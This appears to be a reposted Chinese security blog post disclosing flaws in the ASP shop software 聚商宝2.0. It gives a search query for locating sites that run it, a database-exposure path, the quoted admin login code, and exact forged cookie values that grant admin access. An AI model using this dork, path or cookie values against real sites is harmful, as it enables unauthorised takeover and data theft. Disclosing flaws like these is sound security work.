FROM www.st999.cn/blog BY 久久久电脑
程序:聚商宝2.0
google关键字:intext:技术支持:奔明科技 聚商宝
前几天遇到了个程序叫聚商宝,把源码下载过来了,今天才有时间简单的看了看。。。
漏洞:暴库以及后台cookies欺骗
1)直接访问conn/conn.asp 暴出数据库地址,下载,解密,登录后台
2)cookies欺骗,admin文件夹下check.asp文件中的代码片段:
dim uid,upwd www.2cto.com uid=Replace_Text(Request.Form("userid")) upwd=md5(Replace_Text(Request.Form("password")),16) Verifycode=Replace_Text(request.Form("verifycode")) if not isnumeric(Verifycode) then Call Logerr() Call ErroFy() end if
if Cint(Verifycode)<>Session("SafeCode") then Call ErroFy() Sub ErroFy() response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>" response.write"<TR>" response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>" response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误!</div></td></tr>" response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login. asp '><< 返回上一页</a></td>" response.write"</tr>" response.write"</table>" Response.End() End Sub else
Set rs=server.createobject("adodb.recordset") sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'" rs.open sqltext,conn,1,1 If Rs.Eof And Rs.Bof Then
response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>" response.write"<TR>" response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>" response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正确!</div></td></tr>" response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页</a></td>" response.write"</tr>" response.write"</table>" else Response.Cookies("globalecmaster")=rs("username") Response.Cookies("masterflag")=rs("flag") Response.Cookies("adminid")=rs("id") LastLogin=Date() LastLoginIP=getIP() sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'" conn.execute(sql) response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>" response.write"<TR>" response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>" response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台管理员身份认证!<br><br>2秒后自动进入后台...</div></td></tr>" response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理</a></td>" response.write"</tr>" response.write"</table>" %> <meta HTTP-EQUIV=refresh Content='2;url=index.asp'> <% end if rs.close set rs=nothing end if
利用方法:用啊D直接访问后台,修改如下cookie,然后访问admin/index.asp登录。
globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%
2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1
查看更多关于聚商宝2.0暴库及cookies欺骗缺陷及修复 - 网站安全的详细内容...